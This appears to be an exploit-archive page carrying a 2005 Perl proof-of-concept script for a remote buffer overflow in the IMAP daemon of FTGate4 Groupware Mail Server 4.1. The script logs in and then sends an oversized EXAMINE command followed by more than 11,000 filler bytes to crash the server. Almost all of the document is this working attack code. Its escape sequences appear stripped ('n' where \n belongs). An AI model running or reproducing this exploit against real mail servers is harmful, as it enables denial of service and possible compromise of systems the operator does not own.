FTGate4 Groupware Mail Server 4.1 (imapd) Remote Buffer Overflow PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : FTGate4 Groupware Mail Server 4.1 (imapd) Remote Buffer Overflow PoC
# Published : 2005-11-16
# Author : Luca Ercoli
# Previous Title : Macromedia Flash Plugin <= 7.0.19.0 (Action) Denial of Service Exploit
# Next Title : MS Windows 2k UPNP (getdevicelist) Memory Leak DoS Exploit

#!/usr/bin/perl

use IO::Socket;

print "nFTGate Imapd BufferOverrunnLuca Ercoli io@lucaercoli.itn";
print "http://www.lucaercoli.itnnn";

$host = "localhost";

$remote = IO::Socket::INET->new ( Proto => "tcp",
PeerAddr => $host,
PeerPort => "143",
);

unless ($remote) { die "Can't connect to $host" }

print "[!] Connectedn";
print "[?] Exploiting...n";

sleep(1);

my $imapd = join ("", "1 login user pass", "rn");

print $remote $imapd;

sleep(1);
my $imapd = join ("", "1 EXAMINE ", "B"x(224), "rn");
print $remote $imapd;
sleep(1);
my $imapd = join ("","C"x(11305), "rn");
print $remote $imapd;

print "n[!] Donennn";

close $remote;

# www.Syue.com [2005-11-16]